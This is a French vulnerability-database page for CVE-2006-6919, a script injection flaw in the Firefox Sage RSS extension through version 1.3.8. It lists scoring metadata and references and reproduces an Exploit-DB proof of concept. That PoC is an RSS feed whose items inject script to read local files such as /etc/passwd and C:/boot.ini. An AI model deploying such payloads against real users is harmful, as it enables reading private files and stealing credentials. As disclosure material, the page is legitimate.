CVE-2006-6919 : Détail

CVE-2006-6919

13.72%V3
Network
2007-01-11
22h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Firefox Sage extension 1.3.8 and earlier allows remote attackers to execute arbitrary Javascript in the local context via an RSS feed with an img tag containing the script followed by an extra trailing ">", which Sage modifies to close the img element before the malicious script.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 28501

Date de publication : 2006-09-07 22h00 +00:00
Auteur : pdp
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/19928/info The application is prone to an input-validation vulnerability that allows malicious HTML and script code to be injected before it is used in dynamically generated content. Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. . <rss version="2.0"> . <channel> <title>Cross Context Scripting with Sage</title> . <item> <title>WINDOWS: works with "Allow HTML Tags" off</title> . <content:encoded> <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/boot.ini"); request.send(); alert(request.responseText); } catch(e) {}</script> </content:encoded> </item> . <item> <title>WINDOWS: works with "Allow HTML Tags" on</title> . <content:encoded> <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/boot.ini"); request.send(); alert(request.responseText); } catch(e) {}</script> </content:encoded> </item> . <item> <title>UNIX: works with "Allow HTML Tags" off</title> . <content:encoded> <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/passwd"); request.send(); alert(request.responseText); } catch(e) {}</script> </content:encoded> </item> . <item> <title>UNIX: works with "Allow HTML Tags" on</title> . <content:encoded> <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/passwd"); request.send(); alert(request.responseText); } catch(e) {}</script> </content:encoded> </item> </channel> </rss>

Products Mentioned

Configuraton 0

Sage-mozdev>>Sage >> Version To (including) 1.3.8

Références

http://www.vupen.com/english/advisories/2006/4426
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/22809
Tags : third-party-advisory, x_refsource_SECUNIA